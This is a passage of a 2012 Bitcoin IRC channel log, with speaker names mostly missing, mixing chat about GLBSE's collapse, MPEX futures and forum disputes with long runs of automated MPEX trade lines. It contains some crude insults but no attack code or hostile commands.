pay a de Dec 13 03:51:05 anyway. 1k at a minimum. Dec 13 03:51:08 dev* Dec 13 03:51:17 oh, I was thinking 10's Dec 13 03:51:58 midnightmagic honestly, i don't think any glbse user has any recourse for anything whatsoever. the contracts weren't even signed ffs (when they existed) Dec 13 03:52:21 it was a joke through and through. so, they paid, they played the investors. the beer's drunk, the smoke's smoked, bye. Dec 13 03:53:35 Legitimizing preying on ignorance means that you legitmize preying on anyone. It presupposes that the only person who shouldn't be blamed for losing their own money is basically God. Dec 13 03:54:23 Therefore, any fraud, against anyone, no matter how obtuse they were with their money management, is wrong. Dec 13 03:54:23 hey, i was never in favour of glbse Dec 13 03:54:27 :-) Dec 13 03:54:27 whether you remember this or not. Dec 13 03:54:31 I remember it well. Dec 13 03:54:38 but otherwise, it's what glbse was. legitimizing preying on ignorance Dec 13 03:54:47 deliberately inflating unwarranted presumptions of the suckers Dec 13 03:54:48 etc. Dec 13 03:54:55 [MPEX] [S.MPOE] 6900 @ 0.00057343 = 3.9567 BTC [+] Dec 13 03:55:22 You Europeans have a really dim view of the people you call "suckers" I'm learning. Dec 13 03:56:25 fine. deliberately inflating unwarranted presumptions of innocent ignoramuses apt to believe something is true because 50 different screen names all "Agree" Dec 13 03:56:41 midnightmagic: derp Dec 13 03:56:43 and the one pr two who say otherwise are "evil" because "different" Dec 13 03:56:53 dub: What now? Dec 13 03:58:06 midnightmagic: there are a couple of primary assumptions that are qutie different in say america to many other places Dec 13 03:58:10 https://bitcointalk.org/index.php?topic=130492.0 << a fine example. people do not comprehend statistics. they're told so. they carry on. Dec 13 03:58:18 dub: I am not in "America". Dec 13 03:58:24 oyesyouare! Dec 13 03:58:28 canada is part of the us :D Dec 13 03:58:37 lol oookay. Dec 13 03:58:46 you just don't get to vote is all. Dec 13 03:58:56 midnightmagic: one is 'that person walkign the other way down the street probably doesnt want to kill me and take my shit' Dec 13 03:59:17 dub you ever been to pittsburgh ? Dec 13 03:59:22 dub: .. huh? Dec 13 03:59:48 in eastern europe in particular that would be assumed false afaik Dec 13 04:00:02 not even. Dec 13 04:00:21 dub : earlier today was someone at the gate. guess who ? Dec 13 04:00:40 cabdriver i had used 3 days prior. he was returning a scarf some slut forgot in his car. Dec 13 04:00:40 someone not tryign to kill and steal from you? Dec 13 04:00:52 "he would have come sooner but it's kinda far out so he waited for a ride close" Dec 13 04:01:05 dub: What a horrible way to live, in constant fear. Dec 13 04:01:14 mircea_popescu: out of heart kindness or fear of you guttin ghim? Dec 13 04:01:19 lol Dec 13 04:01:22 midnightmagic: derp :) Dec 13 04:01:35 ten years ago i'd have agreed with you on he later score, but fact is nobody knows me here Dec 13 04:01:41 it;'s just what cabdrivers do. Dec 13 04:01:53 not 'you' Dec 13 04:02:23 i rly dun think it was guttin phobia. Dec 13 04:02:26 [MPEX] [S.MPOE] 1300 @ 0.00057335 = 0.7454 BTC [-] Dec 13 04:02:27 [MPEX] [S.MPOE] 10900 @ 0.00057137 = 6.2279 BTC [-] Dec 13 04:03:08 and the last murder in this (300k pop) town was about 3 years ago Dec 13 04:03:13 some guy found some other guy atop his wife. Dec 13 04:04:44 thats surprising Dec 13 04:04:52 anyway gotta tun Dec 13 04:06:52 [MPEX] [S.MPOE] 4684 @ 0.00057343 = 2.6859 BTC [+] Dec 13 04:06:54 [MPEX] [S.MPOE] 3931 @ 0.00057489 = 2.2599 BTC [+] Dec 13 04:08:00 tun means cannon in romanian which makes this sorta funny Dec 13 04:15:56 [MPEX] [S.MPOE] 4321 @ 0.0005715 = 2.4695 BTC [-] Dec 13 04:15:57 [MPEX] [S.MPOE] 6279 @ 0.00057137 = 3.5876 BTC [-] Dec 13 04:18:57 ;;seen smickles Dec 13 04:18:58 smickles was last seen in #bitcoin-assets 4 hours, 7 minutes, and 40 seconds ago: ;;calc 13.3903/[ticker --last] Dec 13 04:19:04 ;;ticker Dec 13 04:19:05 BTCUSD ticker | Best bid: 13.70000, Best ask: 13.70001, Bid-ask spread: 0.00001, Last trade: 13.70000, 24 hour volume: 38587.41290478, 24 hour low: 13.30000, 24 hour high: 13.79989, 24 hour vwap: 13.61205 Dec 13 04:19:42 oOOooo private mail. Dec 13 04:19:50 [MPEX] [S.MPOE] 4321 @ 0.00057462 = 2.4829 BTC [+] Dec 13 04:19:51 [MPEX] [S.MPOE] 20040 @ 0.00057489 = 11.5208 BTC [+] Dec 13 04:19:53 [MPEX] [S.MPOE] 13787 @ 0.00057512 = 7.9292 BTC [+] Dec 13 04:20:03 mircea_popescu: would you ever put commodities on mpex Dec 13 04:20:18 say crude (for a brash example) Dec 13 04:21:26 [MPEX] [S.MPOE] 4321 @ 0.00057169 = 2.4703 BTC [-] Dec 13 04:21:27 [MPEX] [S.MPOE] 3021 @ 0.00057137 = 1.7261 BTC [-] Dec 13 04:27:16 [MPEX] [S.MPOE] 17408 @ 0.00056705 = 9.8712 BTC [-] Dec 13 04:27:18 [MPEX] [S.MPOE] 5251 @ 0.00057512 = 3.02 BTC [+] Dec 13 04:27:19 [MPEX] [S.MPOE] 2170 @ 0.00057582 = 1.2495 BTC [+] Dec 13 04:32:40 well there's a future Dec 13 04:33:01 !ticker X.EWTI Dec 13 04:33:03 [MPEX:X.EWTI] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.06666667 / 0.06678667 / 0.066794 (1061 shares, 70.86 BTC) Dec 13 04:34:35 future on what btc? Dec 13 04:34:54 why not sell cotton futures or gen food futures Dec 13 04:35:01 be evil like monsanto Dec 13 04:35:17 there's an entire list. Dec 13 04:35:27 see here : http://trilema.com/2012/futures-on-mpex/ Dec 13 04:35:41 there's no cotton but there's cocoa, wheat and corn Dec 13 04:35:43 and cattle Dec 13 04:36:57 these are good futures Dec 13 04:37:08 what's the minimum put down for a bond? Dec 13 04:37:17 well minimum 'buy-in' Dec 13 04:37:26 mpoe bond Dec 13 04:43:17 mpoe bond? like MPBOR? Dec 13 04:43:20 100btc Dec 13 04:44:17 someone should create a bond share Dec 13 04:44:41 [MPEX] [S.MPOE] 4321 @ 0.00056751 = 2.4522 BTC [-] Dec 13 04:44:43 get a bunch of people together to put money into MPBOR Dec 13 04:44:43 [MPEX] [S.MPOE] 19179 @ 0.0005672 = 10.8783 BTC [-] Dec 13 04:48:34 100 Dec 13 04:48:59 that may be something to do, since it takes a little skill to use Dec 13 04:49:03 (pick an optimum % etc) Dec 13 04:49:29 i would need investors Dec 13 04:49:34 and I hate talking to people Dec 13 04:50:03 only one or two people actually seem to talk to the organizer of such things Dec 13 04:50:17 i'm just going to buy futures in energy Dec 13 04:50:32 i would have to create some account with a third party like you smickles Dec 13 04:50:49 and I'd have to get people to give you money to put in that account to put into MPBOR Dec 13 04:51:03 why can;t' you just make a mpex acct ? Dec 13 04:51:19 Cause I'm lazy Dec 13 04:51:39 lolk Dec 13 04:51:55 <- Ameriwon't Dec 13 04:52:12 berry punny :P Dec 13 04:52:24 the energy market has been weird Dec 13 04:52:37 usually gas skyrockets every winter but this winter it didn't Dec 13 04:54:55 tooo much en queue Dec 13 04:55:08 "For what it's worth, I think bASIC should also have a scammer tag. I don't get how they had a working prototype and suddenly have no design." Dec 13 04:55:08 my family ownes mineral rights to alot of natural gas wells around texas etc Dec 13 04:55:20 if NG is not in demand Dec 13 04:55:25 that's a pretty good q right there. how the f ?! Dec 13 04:55:26 they basically shut the wells down Dec 13 04:55:33 so when winter comes Dec 13 04:55:43 there are so many wells ready to pump, theres not enough demand Dec 13 04:59:40 Hi hows life Dec 13 05:00:02 I just decorated my christmas tree Dec 13 05:00:23 sweet Dec 13 05:00:38 [MPEX] [S.MPOE] 4321 @ 0.00057015 = 2.4636 BTC [+] Dec 13 05:00:38 [MPEX] [S.MPOE] 12096 @ 0.00056992 = 6.8938 BTC [-] Dec 13 05:00:38 thought so too Dec 13 05:00:56 not doign a tree this year Dec 13 05:00:58 waiting until next Dec 13 05:01:01 when the youngest is 3 Dec 13 05:01:06 then ima piss teh wife off Dec 13 05:01:09 and get a flocked tree Dec 13 05:01:10 :P Dec 13 05:01:28 (the ones that have been sprayed with teh white shit) Dec 13 05:01:55 ukto -> pm Dec 13 05:05:39 lol Dec 13 05:07:51 [MPEX] [S.MPOE] 8183 @ 0.00056959 = 4.661 BTC [-] Dec 13 05:07:53 [MPEX] [S.MPOE] 2817 @ 0.00057277 = 1.6135 BTC [+] Dec 13 05:20:11 [MPEX] [S.MPOE] 4321 @ 0.00057193 = 2.4713 BTC [-] Dec 13 05:20:13 [MPEX] [S.MPOE] 13670 @ 0.00057203 = 7.8197 BTC [+] Dec 13 05:28:40 I have bought a big spoon Dec 13 05:29:04 for the shit stirrers to stir the f*cking shit Dec 13 05:29:26 omg I hate those drama queens Dec 13 05:35:20 i hear ya Dec 13 05:35:42 [MPEX] [S.MPOE] 4321 @ 0.00056744 = 2.4519 BTC [-] Dec 13 05:35:43 [MPEX] [S.MPOE] 1171 @ 0.0005672 = 0.6642 BTC [-] Dec 13 05:35:44 [MPEX] [S.MPOE] 9108 @ 0.0005668 = 5.1624 BTC [-] Dec 13 05:36:25 man.. I stop posting.. and the fourms go silent :P Dec 13 05:36:46 It's an illusion... but so long as you don't hear it. Dec 13 05:37:26 prolly would not have picked BF anywho tho Dec 13 05:37:56 By the way, I still lack 72 BTC funding for my loan. Anyone interested to lend me till the 10th of January? Dec 13 05:37:59 [MPEX] [S.MPOE] 14550 @ 0.0005668 = 8.2469 BTC [-] Dec 13 05:40:45 ima make so much money by diff not going over 9000 next year... Dec 13 05:41:28 [MPEX] [S.MPOE] 4321 @ 0.000572 = 2.4716 BTC [+] Dec 13 05:41:29 [MPEX] [S.MPOE] 230 @ 0.00057203 = 0.1316 BTC [+] Dec 13 05:41:31 [MPEX] [S.MPOE] 9200 @ 0.00057288 = 5.2705 BTC [+] Dec 13 05:41:32 [MPEX] [S.MPOE] 10356 @ 0.00057305 = 5.9345 BTC [+] Dec 13 05:41:53 Is that your impression of people mass buying ASICs? Dec 13 05:43:51 [MPEX] [S.MPOE] 3350 @ 0.00056684 = 1.8989 BTC [-] Dec 13 05:48:54 [MPEX] [S.MPOE] 971 @ 0.00056684 = 0.5504 BTC [-] Dec 13 05:48:56 [MPEX] [S.MPOE] 7242 @ 0.0005668 = 4.1048 BTC [-] Dec 13 05:48:57 [MPEX] [S.MPOE] 13487 @ 0.00056631 = 7.6378 BTC [-] Dec 13 05:50:41 [MPEX] [S.MPOE] 4321 @ 0.00057202 = 2.4717 BTC [+] Dec 13 05:50:43 [MPEX] [S.MPOE] 5579 @ 0.00057233 = 3.193 BTC [+] Dec 13 05:53:07 [MPEX] [S.MPOE] 4321 @ 0.00057229 = 2.4729 BTC [-] Dec 13 05:53:09 [MPEX] [S.MPOE] 17610 @ 0.00057233 = 10.0787 BTC [+] Dec 13 05:53:09 [MPEX] [S.MPOE] 2269 @ 0.00057305 = 1.3003 BTC [+] Dec 13 05:59:20 http://jcpham.files.wordpress.com/2012/12/cropped-logo-jcph-am.png Dec 13 05:59:38 sexy. also learned everytime i edit i spam twitter Dec 13 06:03:31 Namjies well, back in june it was gonna be october Dec 13 06:03:43 then it was gonna be now and now it's gonna be january... it ain't happening Dec 13 06:06:34 [MPEX] [S.MPOE] 4321 @ 0.00056639 = 2.4474 BTC [-] Dec 13 06:06:35 [MPEX] [S.MPOE] 8294 @ 0.00056631 = 4.697 BTC [-] Dec 13 06:20:28 Well on a sidenote, GLBSE giving out info wasn't happening either... Dec 13 06:20:41 Although it was also a possibility Dec 13 06:20:50 haha i guess so Dec 13 06:20:53 Seems it's going to be partial info so far. Dec 13 06:21:15 Well it's either not happening or getting at least screwed up somewhat. Dec 13 06:27:26 [MPEX] [S.MPOE] 4321 @ 0.00056643 = 2.4475 BTC [+] Dec 13 06:27:27 [MPEX] [S.MPOE] 14388 @ 0.00056631 = 8.1481 BTC [-] Dec 13 06:27:28 [MPEX] [S.MPOE] 9291 @ 0.00056471 = 5.2467 BTC [-] Dec 13 06:43:22 [MPEX] [S.MPOE] 19100 @ 0.00056793 = 10.8475 BTC [+] Dec 13 06:56:24 [MPEX] [S.MPOE] 6536 @ 0.00056471 = 3.6909 BTC [-] Dec 13 06:56:26 [MPEX] [S.MPOE] 11214 @ 0.00056203 = 6.3026 BTC [-] Dec 13 07:00:15 where is th elatest from bfl Dec 13 07:01:14 [MPEX] [S.MPOE] 22416 @ 0.00056203 = 12.5985 BTC [-] Dec 13 07:01:15 [MPEX] [S.MPOE] 784 @ 0.00056193 = 0.4406 BTC [-] Dec 13 07:04:38 [MPEX] [S.MPOE] 14800 @ 0.00056193 = 8.3166 BTC [-] Dec 13 07:16:26 [MPEX] [S.MPOE] 10178 @ 0.00056589 = 5.7596 BTC [+] Dec 13 07:23:44 [MPEX] [S.MPOE] 1504 @ 0.00056276 = 0.8464 BTC [-] Dec 13 07:23:45 [MPEX] [S.MPOE] 17096 @ 0.00056293 = 9.6239 BTC [+] Dec 13 07:43:00 https://bitcointalk.org/index.php?topic=129941.msg1396770 Dec 13 07:43:06 the plot thickens Dec 13 07:47:57 [MPEX] [S.MPOE] 4321 @ 0.00056226 = 2.4295 BTC [-] **** BEGIN LOGGING AT Thu Dec 13 13:06:10 2012 Dec 13 13:07:35 [MPEX] [S.MPOE] 4982 @ 0.00056861 = 2.8328 BTC [+] Dec 13 13:07:36 [MPEX] [S.MPOE] 10060 @ 0.00056877 = 5.7218 BTC [+] Dec 13 13:09:59 [MPEX] [S.MPOE] 2040 @ 0.00056877 = 1.1603 BTC [+] Dec 13 13:10:01 [MPEX] [S.MPOE] 2613 @ 0.00056946 = 1.488 BTC [+] Dec 13 13:10:02 [MPEX] [S.MPOE] 24402 @ 0.00057002 = 13.9096 BTC [+] Dec 13 13:12:38 [MPEX] [S.MPOE] 7222 @ 0.00056844 = 4.1053 BTC [-] Dec 13 13:16:14 [MPEX] [S.MPOE] 4321 @ 0.00056307 = 2.433 BTC [-] Dec 13 13:16:16 [MPEX] [S.MPOE] 18350 @ 0.00056274 = 10.3263 BTC [-] Dec 13 13:16:16 [MPEX] [S.MPOE] 15114 @ 0.0005604 = 8.4699 BTC [-] Dec 13 13:18:27 [MPEX] [S.MPOE] 878 @ 0.00056651 = 0.4974 BTC [+] Dec 13 13:18:28 [MPEX] [S.MPOE] 4321 @ 0.00056982 = 2.4622 BTC [+] Dec 13 13:18:30 [MPEX] [S.MPOE] 15819 @ 0.00057002 = 9.0171 BTC [+] Dec 13 13:18:31 [MPEX] [S.MPOE] 15332 @ 0.00057054 = 8.7475 BTC [+] Dec 13 13:21:22 [MPEX] [S.MPOE] 3400 @ 0.00057038 = 1.9393 BTC [-] Dec 13 13:23:37 [MPEX] [S.MPOE] 4321 @ 0.00056044 = 2.4217 BTC [-] Dec 13 13:23:39 [MPEX] [S.MPOE] 4986 @ 0.0005604 = 2.7942 BTC [-] Dec 13 13:23:40 [MPEX] [S.MPOE] 4128 @ 0.00056027 = 2.3128 BTC [-] Dec 13 13:23:41 [MPEX] [S.MPOE] 13012 @ 0.00056019 = 7.2892 BTC [-] Dec 13 13:23:42 [MPEX] [S.MPOE] 1000 @ 0.00056009 = 0.5601 BTC [-] Dec 13 13:23:43 [MPEX] [S.MPOE] 53 @ 0.00056008 = 0.0297 BTC [-] Dec 13 13:24:35 [MPEX] [S.MPOE] 4321 @ 0.00056043 = 2.4216 BTC [+] Dec 13 13:24:36 [MPEX] [S.MPOE] 19329 @ 0.00056008 = 10.8258 BTC [-] Dec 13 13:46:27 [MPEX] [S.MPOE] 2850 @ 0.00056637 = 1.6142 BTC [+] Dec 13 13:46:29 [MPEX] [S.MPOE] 3318 @ 0.00056008 = 1.8583 BTC [-] Dec 13 13:46:30 [MPEX] [S.MPOE] 6882 @ 0.00055966 = 3.8516 BTC [-] Dec 13 13:54:44 [MPEX] [S.MPOE] 921 @ 0.00057038 = 0.5253 BTC [+] Dec 13 13:54:46 [MPEX] [S.MPOE] 7018 @ 0.00057054 = 4.004 BTC [+] Dec 13 13:54:47 [MPEX] [S.MPOE] 8878 @ 0.00057067 = 5.0664 BTC [+] Dec 13 13:54:48 [MPEX] [S.MPOE] 5611 @ 0.0005707 = 3.2022 BTC [+] Dec 13 14:12:33 [MPEX] [S.MPOE] 4321 @ 0.00057045 = 2.4649 BTC [-] Dec 13 14:12:34 [MPEX] [S.MPOE] 5441 @ 0.0005707 = 3.1052 BTC [+] Dec 13 14:12:36 [MPEX] [S.MPOE] 3988 @ 0.00057102 = 2.2772 BTC [+] Dec 13 14:16:25 [MPEX] [S.MPOE] 4321 @ 0.00057083 = 2.4666 BTC [-] Dec 13 14:16:26 [MPEX] [S.MPOE] 1935 @ 0.00057102 = 1.1049 BTC [+] Dec 13 14:16:28 [MPEX] [S.MPOE] 13644 @ 0.00057146 = 7.797 BTC [+] Dec 13 14:20:14 [MPEX] [S.MPOE] 11922 @ 0.00057146 = 6.8129 BTC [+] Dec 13 14:20:14 [MPEX] [S.MPOE] 78 @ 0.0005717 = 0.0446 BTC [+] Dec 13 14:20:56 "Diablo-D3 | there are bfl posts everywhere that need to be dealt with" - why? Dec 13 14:21:50 [MPEX] [S.MPOE] 10450 @ 0.0005717 = 5.9743 BTC [+] Dec 13 14:23:31 [MPEX] [S.DICE] 5582 @ 0.00334312 = 18.6613 BTC [-] Dec 13 14:23:33 [MPEX] [S.DICE] 2400 @ 0.00334136 = 8.0193 BTC [-] Dec 13 14:26:11 [MPEX] [S.MPOE] 11500 @ 0.00056776 = 6.5292 BTC [-] Dec 13 14:26:12 [MPEX] [S.MPOE] 4321 @ 0.00055997 = 2.4196 BTC [-] Dec 13 14:26:14 [MPEX] [S.MPOE] 4998 @ 0.00055966 = 2.7972 BTC [-] Dec 13 14:26:15 [MPEX] [S.MPOE] 2694 @ 0.00055949 = 1.5073 BTC [-] Dec 13 14:41:52 [MPEX] [S.DICE] 1668 @ 0.00333738 = 5.5667 BTC [-] Dec 13 14:41:54 [MPEX] [S.DICE] 1797 @ 0.00335085 = 6.0215 BTC [+] Dec 13 14:41:55 [MPEX] [S.DICE] 630 @ 0.003395 = 2.1389 BTC [+] Dec 13 14:48:14 [MPEX] [S.MPOE] 2400 @ 0.00056274 = 1.3506 BTC [+] Dec 13 14:57:56 so shit sirrers Dec 13 15:01:31 stelletje kanker mongolen op dat forum Dec 13 15:02:20 ? Dec 13 15:03:54 [MPEX] [S.MPOE] 1921 @ 0.00056249 = 1.0805 BTC [-] Dec 13 15:03:56 [MPEX] [S.MPOE] 21300 @ 0.0005625 = 11.9813 BTC [+] Dec 13 15:03:57 [MPEX] [S.MPOE] 19100 @ 0.00056275 = 10.7485 BTC [+] Dec 13 15:03:58 [MPEX] [S.MPOE] 10462 @ 0.00056419 = 5.9026 BTC [+] Dec 13 15:16:49 [MPEX] [S.MPOE] 4321 @ 0.00056212 = 2.4289 BTC [-] Dec 13 15:16:50 [MPEX] [S.MPOE] 18653 @ 0.00056207 = 10.4843 BTC [-] Dec 13 15:24:59 yeah goat now they are trying to pin me Dec 13 15:25:11 see scam accusations Dec 13 15:26:57 [MPEX] [S.MPOE] 4321 @ 0.00056397 = 2.4369 BTC [+] Dec 13 15:26:57 [MPEX] [S.MPOE] 5638 @ 0.00056419 = 3.1809 BTC [+] Dec 13 15:26:59 [MPEX] [S.MPOE] 1370 @ 0.0005717 = 0.7832 BTC [+] Dec 13 15:28:14 http://trilema.com/2012/further-futures-on-mpex/ << moar futures. Dec 13 15:40:25 I wa getting Graet Dec 13 15:40:35 I think theymos should make a Troll tag Dec 13 15:40:43 and let ppl donate towards it on ppl Dec 13 15:40:50 so you would donate X btc to (person) Dec 13 15:40:56 once that person earns 10btc in troll donations Dec 13 15:41:00 they get Troll tagged Dec 13 15:41:02 :P Dec 13 15:41:02 getting Graet ? i'm a Bitcoin-asset? you are floating me? Dec 13 15:41:03 lol Dec 13 15:41:12 LOL Dec 13 15:41:18 yes Dec 13 15:41:22 now shut up and get back in the box Dec 13 15:41:25 :P Dec 13 15:41:27 k Dec 13 15:41:58 and a fussy prick tag Dec 13 15:42:17 need a club for ppl accused of being scammers that got away Dec 13 15:42:17 :P Dec 13 15:42:20 and a special one for MPOE-PR Dec 13 15:43:00 well Dec 13 15:43:10 I think I made some big progress for BF tonight Dec 13 15:43:13 (almsot 8am) Dec 13 15:43:27 looks like I may have 1~3 new assets for BF Dec 13 15:43:31 lets call it a I got nothing to do so lets pollute some threads with bullshit¨ tag Dec 13 15:43:48 PsychoticBoy: you should take a brether and relax :P Dec 13 15:43:52 your venting. :P Dec 13 15:43:55 [MPEX] [S.MPOE] 6300 @ 0.00056505 = 3.5598 BTC [-] Dec 13 15:43:57 indeed Dec 13 15:44:39 some ppl on the forum make my blood boil, not only mpoe but lots of other mentally disabled ppl Dec 13 15:44:51 for some people, its their job Dec 13 15:44:51 :P Dec 13 15:44:54 but i hear you Dec 13 15:44:56 hehe Dec 13 15:44:58 I am backing off from the forums a bit Dec 13 15:45:13 I should too, but cant I am a mod Dec 13 15:45:21 SCAMMER MOD Dec 13 15:45:22 :P Dec 13 15:45:26 :D Dec 13 15:45:33 you should set that as a title Dec 13 15:45:35 SCAMMER MOD Dec 13 15:45:36 heil to the king baby Dec 13 15:45:36 :P Dec 13 15:45:45 just shuev it ppls faces Dec 13 15:45:58 probably will make some ppl moar mad Dec 13 15:45:58 could mean any number of things Dec 13 15:45:59 [MPEX] [S.MPOE] 4321 @ 0.00056228 = 2.4296 BTC [-] Dec 13 15:46:00 [MPEX] [S.MPOE] 5879 @ 0.00056208 = 3.3045 BTC [-] Dec 13 15:46:04 so? Dec 13 15:46:11 isnt that the point of forums? Dec 13 15:46:13 to make ppl mad? Dec 13 15:46:35 I dont care any more, ppl are taking to much drugs (silk road) bitcoin is bad hmmkay Dec 13 15:46:58 ys Mr. Garrison. Dec 13 15:47:07 look at the replies ppl make on the forum, cant be natural Dec 13 15:47:30 wait Dec 13 15:47:32 wrong character Dec 13 15:47:56 Mr Mackey Dec 13 15:47:57 there Dec 13 15:48:01 indeed Dec 13 15:48:11 havent watched since season 3 or so Dec 13 15:48:30 http://www.youtube.com/watch?v=VCDnR6Px-co Dec 13 15:48:58 thought I did catch an episde of garrison as a woman screaming "Yeah! I'm a monkey! give this money what she wants! Put it in my monkey hole!" Dec 13 15:49:19 didnt know monkey hole was a real term for smething until then Dec 13 15:53:10 [MPEX] [S.MPOE] 4321 @ 0.00056504 = 2.4415 BTC [+] Dec 13 15:53:12 [MPEX] [S.MPOE] 8891 @ 0.00056505 = 5.0239 BTC [+] Dec 13 15:58:05 what's this with mpoe-pr ? Dec 13 15:59:26 [MPEX] [S.MPOE] 10309 @ 0.00056505 = 5.8251 BTC [+] Dec 13 16:02:00 i think he was venting lol Dec 13 16:06:44 Ukto omg learn to set your client blinking ! Dec 13 16:11:00 [MPEX] [S.MPOE] 6201 @ 0.00056772 = 3.5204 BTC [+] Dec 13 16:11:16 I was watching a youtube video Dec 13 16:11:16 :P Dec 13 16:11:37 productivity ftw :D Dec 13 16:11:57 >:P Dec 13 16:12:01 its 8am... Dec 13 16:12:03 no sleep yet Dec 13 16:12:07 was working out a deal for BF Dec 13 16:12:22 to get some good assets.. (kinda related to mpex) and trading volume Dec 13 16:12:35 but were still closing on the details. :) Dec 13 16:13:18 hoefully get to relesae details later today/tomorrow Dec 13 16:14:37 [MPEX] [S.MPOE] 6304 @ 0.00056772 = 3.5789 BTC [+] Dec 13 16:14:39 [MPEX] [S.MPOE] 4771 @ 0.00056208 = 2.6817 BTC [-] Dec 13 16:14:40 [MPEX] [S.MPOE] 6375 @ 0.00056207 = 3.5832 BTC [-] Dec 13 16:16:00 pretty cool Dec 13 16:27:02 [MPEX] [S.MPOE] 15800 @ 0.00057057 = 9.015 BTC [+] Dec 13 16:28:33 [MPEX] [S.MPOE] 3150 @ 0.00057057 = 1.7973 BTC [+] Dec 13 16:28:35 [MPEX] [S.MPOE] 30502 @ 0.0005717 = 17.438 BTC [+] Dec 13 16:28:36 [MPEX] [S.MPOE] 19200 @ 0.00057192 = 10.9809 BTC [+] Dec 13 16:28:37 [MPEX] [S.MPOE] 8562 @ 0.00057193 = 4.8969 BTC [+] Dec 13 16:28:38 [MPEX] [S.MPOE] 5059 @ 0.00057226 = 2.8951 BTC [+] Dec 13 16:28:40 [MPEX] [S.MPOE] 10899 @ 0.00057305 = 6.2457 BTC [+] Dec 13 16:28:41 [MPEX] [S.MPOE] 12000 @ 0.00057311 = 6.8773 BTC [+] Dec 13 16:28:42 [MPEX] [S.MPOE] 27419 @ 0.00057433 = 15.7476 BTC [+] Dec 13 16:28:43 [MPEX] [S.MPOE] 12900 @ 0.00057487 = 7.4158 BTC [+] Dec 13 16:28:44 [MPEX] [S.MPOE] 16100 @ 0.00057498 = 9.2572 BTC [+] Dec 13 16:28:44 [MPEX] [S.MPOE] 18250 @ 0.00057508 = 10.4952 BTC [+] Dec 13 16:28:45 [MPEX] [S.MPOE] 29200 @ 0.00057518 = 16.7953 BTC [+] Dec 13 16:28:46 [MPEX] [S.MPOE] 20550 @ 0.00057518 = 11.8199 BTC [+] Dec 13 16:28:47 [MPEX] [S.MPOE] 27100 @ 0.00057519 = 15.5876 BTC [+] Dec 13 16:28:48 [MPEX] [S.MPOE] 1543 @ 0.00057582 = 0.8885 BTC [+] Dec 13 16:28:49 [MPEX] [S.MPOE] 19250 @ 0.00057661 = 11.0997 BTC [+] Dec 13 16:28:51 [MPEX] [S.MPOE] 24613 @ 0.00057781 = 14.2216 BTC [+] Dec 13 16:28:52 [MPEX] [S.MPOE] 24050 @ 0.00057795 = 13.8997 BTC [+] Dec 13 16:28:53 [MPEX] [S.MPOE] 10300 @ 0.000578 = 5.9534 BTC [+] Dec 13 16:28:54 [MPEX] [S.MPOE] 22550 @ 0.00057817 = 13.0377 BTC [+] Dec 13 16:28:55 [MPEX] [S.MPOE] 18100 @ 0.00057821 = 10.4656 BTC [+] Dec 13 16:28:56 [MPEX] [S.MPOE] 25737 @ 0.00057858 = 14.8909 BTC [+] Dec 13 16:28:56 [MPEX] [S.MPOE] 21300 @ 0.00057868 = 12.3259 BTC [+] Dec 13 16:28:57 [MPEX] [S.MPOE] 7150 @ 0.00057954 = 4.1437 BTC [+] Dec 13 16:28:58 [MPEX] [S.MPOE] 10900 @ 0.00057959 = 6.3175 BTC [+] Dec 13 16:28:59 [MPEX] [S.MPOE] 8750 @ 0.00057969 = 5.0723 BTC [+] Dec 13 16:29:00 [MPEX] [S.MPOE] 13145 @ 0.00057996 = 7.6236 BTC [+] Dec 13 16:29:01 [MPEX] [S.MPOE] 20750 @ 0.00058009 = 12.0369 BTC [+] Dec 13 16:29:02 [MPEX] [S.MPOE] 12900 @ 0.00058024 = 7.4851 BTC [+] Dec 13 16:29:03 [MPEX] [S.MPOE] 11600 @ 0.0005805 = 6.7338 BTC [+] Dec 13 16:29:04 [MPEX] [S.MPOE] 12256 @ 0.00058051 = 7.1147 BTC [+] Dec 13 16:29:05 [MPEX] [S.MPOE] 6950 @ 0.00058095 = 4.0376 BTC [+] Dec 13 16:29:05 [MPEX] [S.MPOE] 16900 @ 0.00058095 = 9.8181 BTC [+] Dec 13 16:29:06 [MPEX] [S.MPOE] 11500 @ 0.00058115 = 6.6832 BTC [+] Dec 13 16:29:07 [MPEX] [S.MPOE] 6989 @ 0.00058126 = 4.0624 BTC [+] Dec 13 16:29:08 [MPEX] [S.MPOE] 39550 @ 0.00058171 = 23.0066 BTC [+] Dec 13 16:29:09 [MPEX] [S.MPOE] 10900 @ 0.00058188 = 6.3425 BTC [+] Dec 13 16:29:10 [MPEX] [S.MPOE] 11427 @ 0.00058195 = 6.6499 BTC [+] Dec 13 16:29:11 [MPEX] [S.MPOE] 2450 @ 0.00058227 = 1.4266 BTC [+] Dec 13 16:29:12 [MPEX] [S.MPOE] 7300 @ 0.00058237 = 4.2513 BTC [+] Dec 13 16:29:13 [MPEX] [S.MPOE] 17045 @ 0.00058238 = 9.9267 BTC [+] Dec 13 16:29:14 [MPEX] [S.MPOE] 54350 @ 0.00058258 = 31.6632 BTC [+] Dec 13 16:29:15 [MPEX] [S.MPOE] 6257 @ 0.00058265 = 3.6456 BTC [+] Dec 13 16:29:16 [MPEX] [S.MPOE] 4900 @ 0.00058277 = 2.8556 BTC [+] Dec 13 16:29:17 [MPEX] [S.MPOE] 15600 @ 0.00058303 = 9.0953 BTC [+] Dec 13 16:29:18 [MPEX] [S.MPOE] 35234 @ 0.00058318 = 20.5478 BTC [+] Dec 13 16:29:19 [MPEX] [S.MPOE] 4347 @ 0.00058376 = 2.5376 BTC [+] Dec 13 16:29:20 [MPEX] [S.MPOE] 6900 @ 0.00058378 = 4.0281 BTC [+] Dec 13 16:29:21 [MPEX] [S.MPOE] 30200 @ 0.00058407 = 17.6389 BTC [+] Dec 13 16:29:22 [MPEX] [S.MPOE] 11500 @ 0.00058481 = 6.7253 BTC [+] Dec 13 16:29:23 [MPEX] [S.MPOE] 22294 @ 0.00058493 = 13.0404 BTC [+] Dec 13 16:29:24 [MPEX] [S.MPOE] 24811 @ 0.00058536 = 14.5234 BTC [+] Dec 13 16:29:25 [MPEX] [S.MPOE] 19150 @ 0.00058574 = 11.2169 BTC [+] Dec 13 16:29:26 [MPEX] [S.MPOE] 17998 @ 0.00058607 = 10.5481 BTC [+] Dec 13 16:29:27 [MPEX] [S.MPOE] 16250 @ 0.00058667 = 9.5334 BTC [+] Dec 13 16:29:28 [MPEX] [S.MPOE] 25071 @ 0.00058681 = 14.7119 BTC [+] Dec 13 16:29:29 [MPEX] [S.MPOE] 24250 @ 0.00058699 = 14.2345 BTC [+] Dec 13 16:29:30 [MPEX] [S.MPOE] 14000 @ 0.00058726 = 8.2216 BTC [+] Dec 